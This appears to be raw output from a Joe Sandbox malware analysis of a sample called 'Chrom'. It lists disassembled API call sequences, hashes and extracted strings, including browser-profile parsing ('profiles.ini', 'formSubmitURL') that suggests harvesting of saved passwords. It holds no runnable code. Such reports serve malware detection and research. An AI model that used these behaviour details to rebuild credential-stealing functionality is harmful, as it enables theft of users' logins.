• GetModuleHandleW.KERNEL32(00000000), ref: 00404055
• LoadIconW.USER32(00000000,00000079), ref: 0040405A
• ImageList_ReplaceIcon.COMCTL32(?,00000009,00000000), ref: 00404065
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Icon$Image$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 264706568-0
• Opcode ID: 9f26e654fdeb6fce359c75dfd32fafc8b0d8d0789e32bb966788a2aece390ca3
• Instruction ID: fa83cebbb95bcb8725bd261a30b51bef8f87386f5cc1911db7833ce7996ea14a
• Opcode Fuzzy Hash: 9f26e654fdeb6fce359c75dfd32fafc8b0d8d0789e32bb966788a2aece390ca3
• Instruction Fuzzy Hash: 56210EA0A897087AF63137B2DC4BF6B7A5EDF81B45F224414F74C990E1C9E6AC104928
APIs
  • Part of subcall function 00410381: memset.MSVCRT ref: 004103C4
  • Part of subcall function 00410381: memset.MSVCRT ref: 004103D9
  • Part of subcall function 00410381: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004103EB
  • Part of subcall function 00410381: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00410409
  • Part of subcall function 00410381: SendMessageW.USER32(?,00001003,00000001,?), ref: 00410446
  • Part of subcall function 00410381: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0041045A
  • Part of subcall function 00410381: ImageList_SetImageCount.COMCTL32(00000000,0000000A), ref: 00410465
  • Part of subcall function 00410381: SendMessageW.USER32(?,00001003,00000000,?), ref: 0041047D
  • Part of subcall function 00410381: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00410489
  • Part of subcall function 00410381: GetModuleHandleW.KERNEL32(00000000), ref: 00410498
  • Part of subcall function 00410381: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 004104AA
  • Part of subcall function 00410381: GetModuleHandleW.KERNEL32(00000000), ref: 004104B5
  • Part of subcall function 00410381: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 004104C7
  • Part of subcall function 00410381: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004104D8
  • Part of subcall function 00410381: GetSysColor.USER32(0000000F), ref: 004104E0
• GetModuleHandleW.KERNEL32(00000000), ref: 00403F95
• LoadIconW.USER32(00000000,00000072), ref: 00403FA0
• ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403FB1
• GetModuleHandleW.KERNEL32(00000000), ref: 00403FB5
• LoadIconW.USER32(00000000,00000074), ref: 00403FBA
• ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00403FC5
• GetModuleHandleW.KERNEL32(00000000), ref: 00403FC9
• LoadIconW.USER32(00000000,00000073), ref: 00403FCE
• ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 00403FD9
• GetModuleHandleW.KERNEL32(00000000), ref: 00403FDD
• LoadIconW.USER32(00000000,00000075), ref: 00403FE2
• ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 00403FED
• GetModuleHandleW.KERNEL32(00000000), ref: 00403FF1
• LoadIconW.USER32(00000000,0000006F), ref: 00403FF6
• ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 00404001
• GetModuleHandleW.KERNEL32(00000000), ref: 00404005
• LoadIconW.USER32(00000000,00000076), ref: 0040400A
• ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 00404015
• GetModuleHandleW.KERNEL32(00000000), ref: 00404019
• LoadIconW.USER32(00000000,00000077), ref: 0040401E
• ImageList_ReplaceIcon.COMCTL32(?,00000006,00000000), ref: 00404029
• GetModuleHandleW.KERNEL32(00000000), ref: 0040402D
• LoadIconW.USER32(00000000,00000070), ref: 00404032
• ImageList_ReplaceIcon.COMCTL32(?,00000007,00000000), ref: 0040403D
• GetModuleHandleW.KERNEL32(00000000), ref: 00404041
• LoadIconW.USER32(00000000,00000078), ref: 00404046
• ImageList_ReplaceIcon.COMCTL32(?,00000008,00000000), ref: 00404051
• GetModuleHandleW.KERNEL32(00000000), ref: 00404055
• LoadIconW.USER32(00000000,00000079), ref: 0040405A
• ImageList_ReplaceIcon.COMCTL32(?,00000009,00000000), ref: 00404065
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Icon$Image$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 264706568-0
• Opcode ID: 7a8e7a753c4a6969c8ebad43a6ff4298becb11f1dffce4c04823a78b46f89c4a
• Instruction ID: 4987a5fc14cceb3ec057973e66b70c09839ea495ac49043ce4cc72b72b9a55f5
• Opcode Fuzzy Hash: 7a8e7a753c4a6969c8ebad43a6ff4298becb11f1dffce4c04823a78b46f89c4a
• Instruction Fuzzy Hash: 46211DA0B857087AF63037B2DC4BF7B7A5EDF81B89F224410F74C990E0C9E6AC104928
APIs
• EndDialog.USER32(?,?), ref: 00413749
                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00413761
                                                                                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0041377F
                                                                                                                                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 0041378B
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00413793
                                                                                                                                                        • memset.MSVCRT ref: 004137BA
                                                                                                                                                        • memset.MSVCRT ref: 004137DC
                                                                                                                                                        • memset.MSVCRT ref: 004137F5
                                                                                                                                                        • memset.MSVCRT ref: 00413809
                                                                                                                                                        • memset.MSVCRT ref: 00413823
                                                                                                                                                        • memset.MSVCRT ref: 00413838
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00413840
                                                                                                                                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00413863
                                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00413895
                                                                                                                                                        • memset.MSVCRT ref: 004138E8
                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004138F6
                                                                                                                                                        • memcpy.MSVCRT(?,0045BA90,0000021C), ref: 00413924
                                                                                                                                                        • wcscpy.MSVCRT ref: 00413947
                                                                                                                                                        • _snwprintf.MSVCRT ref: 004139B6
                                                                                                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004139CE
                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 004139D8
                                                                                                                                                        • SetFocus.USER32(00000000), ref: 004139DF
                                                                                                                                                        Strings
                                                                                                                                                        • {Unknown}, xrefs: 004137CE
                                                                                                                                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 004139AB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                        • API String ID: 4111938811-1819279800
                                                                                                                                                        • Opcode ID: 96155596f3279f9d03c0a9243ad5968801c4fe39fa66a488338b1dd2f38d3b4c
                                                                                                                                                        • Instruction ID: f28911e6e9c8f7c9bcffcad48f5b4909217dcd52314a7c8ddb419c581ced49a2
                                                                                                                                                        • Opcode Fuzzy Hash: 96155596f3279f9d03c0a9243ad5968801c4fe39fa66a488338b1dd2f38d3b4c
                                                                                                                                                        • Instruction Fuzzy Hash: 087180B280121DFEEB11AF51DC45EEB776CEB08355F0440BAF508A2151EB799E848FA9
                                                                                                                                                        APIs
                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00401808
                                                                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040181A
                                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401850
                                                                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040185D
                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040188B
                                                                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040189D
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 004018A6
                                                                                                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 004018AF
                                                                                                                                                        • SetCursor.USER32(00000000,?,?), ref: 004018B6
                                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004018D7
                                                                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004018E4
                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004018FE
                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0040190A
                                                                                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 00401918
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00401920
                                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401941
                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00401976
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00401982
                                                                                                                                                        • GetDlgItem.USER32(?,000003ED), ref: 004019A7
                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 004019B0
                                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004019BC
                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 004019BF
                                                                                                                                                        • SetDlgItemTextW.USER32(?,000003EE,0045E778), ref: 004019D0
                                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 004019E2
                                                                                                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004019FA
                                                                                                                                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 00401A0B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 829165378-0
                                                                                                                                                        • Opcode ID: 28d1f74300f5acc619f393cf0bab4760741c336622d5a51f223752340646ab01
                                                                                                                                                        • Instruction ID: 2e860b65d83457e398c211b7ef8e3c32b9ff1fce9bb52c2d4974f341227d48e7
                                                                                                                                                        • Opcode Fuzzy Hash: 28d1f74300f5acc619f393cf0bab4760741c336622d5a51f223752340646ab01
                                                                                                                                                        • Instruction Fuzzy Hash: 3E519D79500708ABEB21AF70DC88E6E7BB5FB44301F10493AF552A21F1C7B9AA54DF18
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040D8B5: LoadMenuW.USER32(00000000), ref: 0040D8BD
                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 00410F9A
                                                                                                                                                        • CreateStatusWindowW.COMCTL32(50000000,0044F4CC,?,00000101), ref: 00410FB5
                                                                                                                                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00410FCD
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00410FDC
                                                                                                                                                        • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 00410FE9
                                                                                                                                                        • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 00411013
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00411020
                                                                                                                                                        • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411047
                                                                                                                                                        • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 0041110F
                                                                                                                                                        • ShowWindow.USER32(?,?), ref: 00411145
                                                                                                                                                        • GetFileAttributesW.KERNEL32(0045F078), ref: 00411176
                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,0045F078), ref: 00411186
                                                                                                                                                        • RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 004111C1
                                                                                                                                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 004111FB
                                                                                                                                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0041120E
                                                                                                                                                          • Part of subcall function 004054CF: wcslen.MSVCRT ref: 004054EC
                                                                                                                                                          • Part of subcall function 004054CF: SendMessageW.USER32(?,00001061,?,?), ref: 00405510
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Message$SendWindow$Create$HandleLoadMenuModule$AttributesFileImagePathRegisterShowStatusTempToolbarmemcpywcslen
                                                                                                                                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                        • API String ID: 2327787793-2103577948
                                                                                                                                                        • Opcode ID: 777271bfed07e17862ed6d8aebfb67f85c61c800a569c266c8f994dafd1a2857
                                                                                                                                                        • Instruction ID: 95a3d167940fe3ebdcb7c516ac7433945ec5bcbd5685e9f747196b27d1c22ec3
                                                                                                                                                        • Opcode Fuzzy Hash: 777271bfed07e17862ed6d8aebfb67f85c61c800a569c266c8f994dafd1a2857
                                                                                                                                                        • Instruction Fuzzy Hash: FEA1BF71640388AFEB11DF64CC89BCA3FA5AF55304F0444B9FE08AF292C7B59548CB69
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(0040E0C9,?,00000000), ref: 0044667B
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040E0C9,?,00000000), ref: 00446696
                                                                                                                                                        • GetFileVersionInfoW.VERSION(0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466A6
                                                                                                                                                        • VerQueryValueW.VERSION(00000000,00453E4C,0040E0C9,?,0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466B9
                                                                                                                                                        • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,00453E4C,0040E0C9,?,0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466F6
                                                                                                                                                        • _snwprintf.MSVCRT ref: 00446716
                                                                                                                                                        • wcscpy.MSVCRT ref: 00446740
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 004467F0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                         • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                         • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
• String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
• API String ID: 1223191525-1542517562
• Opcode ID: d4dd335fc41ad2063f46854916b7d01aa3fbdbc7a054ebd33d2c839f8f36a85c
• Instruction ID: d5653fb1b2b7478917158de9cf610de98b6740d2027696868c611b94d6ffcb81
• Opcode Fuzzy Hash: d4dd335fc41ad2063f46854916b7d01aa3fbdbc7a054ebd33d2c839f8f36a85c
• Instruction Fuzzy Hash: C64113B2A00218BAD704EF91DD41DDEB7ACFF09304F11451BB905B3142EF78A659CBA9
APIs
• memset.MSVCRT ref: 004103C4
• memset.MSVCRT ref: 004103D9
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004103EB
• SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00410409
• ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00410422
• ImageList_SetImageCount.COMCTL32(00000000,0000000A), ref: 0041042D
• SendMessageW.USER32(?,00001003,00000001,?), ref: 00410446
• ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0041045A
• ImageList_SetImageCount.COMCTL32(00000000,0000000A), ref: 00410465
• SendMessageW.USER32(?,00001003,00000000,?), ref: 0041047D
• ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00410489
• GetModuleHandleW.KERNEL32(00000000), ref: 00410498
• LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 004104AA
• GetModuleHandleW.KERNEL32(00000000), ref: 004104B5
• LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 004104C7
• ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004104D8
• GetSysColor.USER32(0000000F), ref: 004104E0
• ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 004104FB
• ImageList_AddMasked.COMCTL32(?,?,?), ref: 0041050B
• DeleteObject.GDI32(?), ref: 00410517
• DeleteObject.GDI32(?), ref: 0041051D
• SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0041053A
Yara matches
Similarity
• API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 304928396-0
• Opcode ID: d592f4ebbee006bb6ed55b3a21e33839510d47025a9d6a972f2f5b101dbbb872
• Instruction ID: 7f26086368a8811bff09cc620d8db4ef3709b429c5b5910aef32137d5162c258
• Opcode Fuzzy Hash: d592f4ebbee006bb6ed55b3a21e33839510d47025a9d6a972f2f5b101dbbb872
• Instruction Fuzzy Hash: 84419675640304BFE720AF60DC8AFD77798FB49745F000839B799A61D1C7F6A8849B29
APIs
Strings
Yara matches
Similarity
• API ID: _snwprintfmemset$wcscpy$wcscat
• String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s$o<@
• API String ID: 1607361635-3679438452
• Opcode ID: 4731570b1df8245d9ba0a7b5cb35d7f58960f04d5df534be5afec6bb741ccfcf
• Instruction ID: c9c9c2a4c0014aec28f6a6d1c50fe2906790d152b0bc8d99d06e27721e28e2e0
• Opcode Fuzzy Hash: 4731570b1df8245d9ba0a7b5cb35d7f58960f04d5df534be5afec6bb741ccfcf
• Instruction Fuzzy Hash: 5B61C031900208EFDF24EF54CC85EEE7779EF45314F1041AAF804AB292DB39AA94CB55
APIs
• memset.MSVCRT ref: 00413513
  • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
  • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
  • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
  • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
  • Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
• wcscpy.MSVCRT ref: 00413577
• wcscpy.MSVCRT ref: 00413588
• memset.MSVCRT ref: 004135A1
• memset.MSVCRT ref: 004135B6
• _snwprintf.MSVCRT ref: 004135D0
• wcscpy.MSVCRT ref: 004135E3
• memset.MSVCRT ref: 0041360F
• memset.MSVCRT ref: 0041366E
• memset.MSVCRT ref: 00413683
• _snwprintf.MSVCRT ref: 0041369F
• wcscpy.MSVCRT ref: 004136B2
Strings
Yara matches
Similarity
• API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
• String ID: General$IsRelative$Path$Profile%d$profiles.ini
• API String ID: 2454223109-2600475665
• Opcode ID: f5d1d8963b751ecd1a35c643c487ff4ade738b5c65df3c9a6eb4e6993c7bb1e1
• Instruction ID: 9f98b962bf64fc41312729a32297df74b75f7af46428a9f2a50f724a012a647b
• Opcode Fuzzy Hash: f5d1d8963b751ecd1a35c643c487ff4ade738b5c65df3c9a6eb4e6993c7bb1e1
• Instruction Fuzzy Hash: C6510DB294122CBADB20EB55CD45ECF77BCAF55754F0140E6B508A2142EA385B84CFAA
APIs
Strings
Yara matches
Similarity
• API ID: wcscat$_snwprintfmemset$wcscpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
• API String ID: 3143752011-1996832678
• Opcode ID: 3ea85b475066484b5fca8c45ce1ff678e1ca65170c514b6952232c65087133fa
• Instruction ID: 38fb58bcee569138cf1c6d38f2492e07bff0653b862c37002d8b5a61cc6a81ae
• Opcode Fuzzy Hash: 3ea85b475066484b5fca8c45ce1ff678e1ca65170c514b6952232c65087133fa
• Instruction Fuzzy Hash: 0A31C8B2501309BDE720BB559D829BE737C9B41715F21806FF61462182E67C9E858B19
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040BB60,?,000000FF,00000000,00000104), ref: 00413A6A
• GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413A81
• GetProcAddress.KERNEL32(NtLoadDriver), ref: 00413A93
• GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00413AA5
• GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00413AB7
• GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00413AC9
• GetProcAddress.KERNEL32(NtQueryObject), ref: 00413ADB
• GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00413AED
• GetProcAddress.KERNEL32(NtResumeProcess), ref: 00413AFF
Strings
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                        • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                        • API String ID: 667068680-2887671607
                                                                                                                                                        • Opcode ID: 688ae1a650c2843fb022fdb0e80312dcfa35bd94c2434b86a4149cb05d0d823f
                                                                                                                                                        • Instruction ID: 3094f08e780b7640ee0285fea3f53bfe9e93f2d39e0d9e3b23931a4aeb60f93e
                                                                                                                                                        • Opcode Fuzzy Hash: 688ae1a650c2843fb022fdb0e80312dcfa35bd94c2434b86a4149cb05d0d823f
                                                                                                                                                        • Instruction Fuzzy Hash: 91019774D41714AACB2B9F72ED19A153FA0F704B6371004B7E805922A3DA7CC20CCE8D
APIs
  • Part of subcall function 0040D0D4: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040118B,?,?,?,?,000003FF), ref: 0040D0F2
  • Part of subcall function 0040D0D4: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040D146
  • Part of subcall function 0040D19E: _wcsicmp.MSVCRT ref: 0040D1D8
• memset.MSVCRT ref: 004091C9
• memset.MSVCRT ref: 004091DE
• _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,formSubmitURL,guid,00000000,00000132,00000000,00000131,00000000), ref: 00409349
• _wcsicmp.MSVCRT ref: 0040935D
• memset.MSVCRT ref: 0040937E
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 004093B2
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004093C9
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004093E0
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004093F7
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000000FF,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040940E
  • Part of subcall function 0040911D: _wtoi64.MSVCRT ref: 00409121
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00409425
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040943C
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00409453
  • Part of subcall function 00408F0A: memset.MSVCRT ref: 00408F30
  • Part of subcall function 00408F0A: memset.MSVCRT ref: 00408F47
  • Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408F6A
  • Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FC3
  • Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FDA
  • Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FED
